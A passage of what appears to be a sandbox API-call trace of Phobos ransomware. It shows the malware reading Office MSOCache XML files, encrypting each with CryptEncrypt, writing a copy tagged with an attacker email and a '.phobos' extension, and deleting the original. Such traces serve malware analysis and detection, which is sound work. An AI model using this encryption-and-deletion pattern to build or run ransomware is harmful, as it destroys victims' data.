lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0134.514] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0134.514] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0134.586] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0134.586] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0134.586] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x567, lpOverlapped=0x0) returned 1 [0137.242] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x570, dwBufLen=0x570 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x570) returned 1 [0137.242] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x570, lpOverlapped=0x0) returned 1 [0137.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2eb08) returned 1 [0137.243] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.243] CryptEncrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0137.243] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0137.243] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0137.243] CryptDestroyKey (hKey=0xa2e408) returned 1 [0137.243] CloseHandle (hObject=0x140) returned 1 [0137.243] CloseHandle (hObject=0x134) returned 1 [0137.245] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0137.245] ResetEvent (hEvent=0x108) returned 1 [0137.245] SetEvent (hEvent=0x10c) returned 1 [0137.246] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0137.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0137.246] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1852) returned 1 [0137.246] CloseHandle (hObject=0x134) returned 1 [0137.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0137.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0137.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0137.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0137.248] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0137.248] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.248] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x73c, lpOverlapped=0x0) returned 1 [0137.315] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x740, dwBufLen=0x740 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x740) returned 1 [0137.315] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x740, lpOverlapped=0x0) returned 1 [0137.316] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e4d8) returned 1 [0137.316] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.316] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0137.316] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0137.316] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0137.316] CryptDestroyKey (hKey=0xa2e408) returned 1 [0137.316] CloseHandle (hObject=0x134) returned 1 [0137.316] CloseHandle (hObject=0x140) returned 1 [0137.317] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0137.318] ResetEvent (hEvent=0x108) returned 1 [0137.318] SetEvent (hEvent=0x10c) returned 1 [0137.318] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0137.318] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0137.424] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9503) returned 1 [0137.425] CloseHandle (hObject=0x138) returned 1 [0137.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0137.425] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0137.425] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0137.425] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.425] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.425] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0137.425] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0137.425] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.425] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x251f, lpOverlapped=0x0) returned 1 [0137.683] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2520, dwBufLen=0x2520 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2520) returned 1 [0137.683] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2520, lpOverlapped=0x0) returned 1 [0137.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e570) returned 1 [0137.684] CryptSetKeyParam (hKey=0xa2e570, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.684] CryptEncrypt (in: hKey=0xa2e570, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0137.684] CryptDestroyKey (hKey=0xa2e570) returned 1 [0137.684] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0137.684] CryptDestroyKey (hKey=0xa2e408) returned 1 [0137.684] CloseHandle (hObject=0x138) returned 1 [0137.684] CloseHandle (hObject=0x124) returned 1 [0137.685] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0137.686] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0137.686] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0137.687] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1606) returned 1 [0137.687] CloseHandle (hObject=0x124) returned 1 [0137.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0137.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0137.687] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0137.687] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.687] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.687] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0137.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0137.687] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.687] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x646, lpOverlapped=0x0) returned 1 [0137.855] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x650, dwBufLen=0x650 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x650) returned 1 [0137.855] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x650, lpOverlapped=0x0) returned 1 [0137.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e5b0) returned 1 [0137.856] CryptSetKeyParam (hKey=0xa2e5b0, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.856] CryptEncrypt (in: hKey=0xa2e5b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0137.856] CryptDestroyKey (hKey=0xa2e5b0) returned 1 [0137.856] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0137.856] CryptDestroyKey (hKey=0xa2e408) returned 1 [0137.856] CloseHandle (hObject=0x124) returned 1 [0137.857] CloseHandle (hObject=0x138) returned 1 [0137.857] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0137.858] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0137.858] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0137.858] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1988) returned 1 [0137.858] CloseHandle (hObject=0x138) returned 1 [0137.858] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0137.858] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0137.859] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0137.859] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.859] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0137.859] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0137.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0137.859] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0137.859] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7c4, lpOverlapped=0x0) returned 1 [0138.131] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7d0, dwBufLen=0x7d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7d0) returned 1 [0138.131] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7d0, lpOverlapped=0x0) returned 1 [0138.132] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa2e850) returned 1 [0138.132] CryptSetKeyParam (hKey=0xa2e850, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.132] CryptEncrypt (in: hKey=0xa2e850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0138.132] CryptDestroyKey (hKey=0xa2e850) returned 1 [0138.132] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0138.132] CryptDestroyKey (hKey=0xa2e408) returned 1 [0138.132] CloseHandle (hObject=0x138) returned 1 [0138.132] CloseHandle (hObject=0x124) returned 1 [0138.133] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0138.134] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0138.134] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0138.213] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1452) returned 1 [0138.213] CloseHandle (hObject=0x124) returned 1 [0138.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0138.213] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0138.214] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0138.214] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.214] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0138.214] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0138.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa2e408) returned 1 [0138.215] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0138.215] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5ac, lpOverlapped=0x0) returned 1 [0138.238] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5b0) returned 1 [0138.238] WriteFile (in: hFile=0x138, 